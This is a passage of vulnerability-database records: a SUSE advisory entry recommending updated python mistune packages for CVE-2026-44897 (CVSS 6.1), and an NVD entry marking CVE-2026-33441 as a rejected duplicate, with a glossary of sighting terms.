"title": "CVE-2026-33441"
},
{
"cve": "CVE-2026-44897",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-44897"
}
],
"notes": [
{
"category": "general",
"text": "unknown",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-44897",
"url": "https://www.suse.com/security/cve/CVE-2026-44897"
},
{
"category": "external",
"summary": "SUSE Bug 1264750 for CVE-2026-44897",
"url": "https://bugzilla.suse.com/1264750"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python311-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python313-mistune-3.2.1-1.1.x86_64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.aarch64",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.ppc64le",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.s390x",
"openSUSE Tumbleweed:python314-mistune-3.2.1-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-12T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-44897"
}
]
}
FKIE_CVE-2026-33441
Vulnerability from fkie_nvd - Published: 2026-05-06 20:16 - Updated: 2026-05-06 20:16| URL | Tags |
|---|
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Rejected reason: This CVE is a duplicate of another CVE: CVE-2026-33079."
}
],
"id": "CVE-2026-33441",
"lastModified": "2026-05-06T20:16:31.473",
"metrics": {},
"published": "2026-05-06T20:16:31.473",
"references": [],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Rejected"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.